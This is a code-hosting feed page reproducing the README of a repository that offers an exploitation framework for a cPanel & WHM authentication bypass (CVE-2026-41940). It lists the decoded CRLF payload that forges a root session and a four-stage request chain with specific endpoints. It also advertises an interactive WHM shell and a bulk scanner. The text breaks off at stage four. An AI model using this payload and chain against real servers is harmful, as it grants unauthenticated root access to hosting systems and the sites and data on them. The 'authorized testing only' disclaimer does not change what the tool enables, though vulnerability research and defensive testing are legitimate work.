GitFeed
Back to feed

ynsmroztas/cPanelSniper

ynsmroztas/cPanelSniper
239
+43/day
80
Python

CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection

From the README

cPanelSniper

CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection 4-stage exploit chain · Interactive WHM Shell · Bulk scanner · Pipeline ready · stdlib only

Overview

cPanelSniper is a focused exploitation framework for CVE-2026-41940, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the Authorization HTTP header — without any valid credentials.

  • CVSS Score: 10.0 (Critical)
  • In-the-wild exploitation: Confirmed (April 2026)
  • Affected installs: ~70 million domains running cPanel & WHM
  • No dependencies: Pure Python stdlib — no pip, no requests, no external packages

For authorized penetration testing and bug bounty programs only.

How It Works

The root cause lives in Session.pm: the saveSession() function calls filter_sessiondata() after writing the session file to disk. This means CRLF characters embedded in the Authorization: Basic header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.

Normal flow:
  POST /login/ → filter_sessiondata() → write session → auth check

Vulnerable flow:
  POST /login/ → write session (CRLF payload injected) → filter_sessiondata() → auth check reads poisoned file

The CRLF Payload

The Authorization: Basic value decodes to:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.

4-Stage Exploit Chain

┌─────────────────────────────────────────────────────────────┐
│  Stage 0 — Canonical Hostname Discovery                     │
│  GET /openid_connect/cpanelid → 307 → real hostname         │
├─────────────────────────────────────────────────────────────┤
│  Stage 1 — Mint Preauth Session                             │
│  POST /login/?login_only=1  (wrong creds)                   │
│  ← 401 + whostmgrsession cookie                             │
├─────────────────────────────────────────────────────────────┤
│  Stage 2 — CRLF Injection                                   │
│  GET / + Cookie: session + Authorization: Basic    │
│  cpsrvd writes CRLF fields into session file                │
│  ← 307 Location: /cpsessXXXXXXXXXX/...                     │
├─────────────────────────────────────────────────────────────┤
│  Stage 3 — Propagate (do_token_denied gadget)               │
│  GET /scripts2/listaccts                                    │
│  Triggers raw→cache flush — injected fields become active   │
│  ← 401 Token denied (expected)                              │
├─────────────────────────────────────────────────────────────┤
│  Stage 4 — Verify WHM Root Access
View on GitHub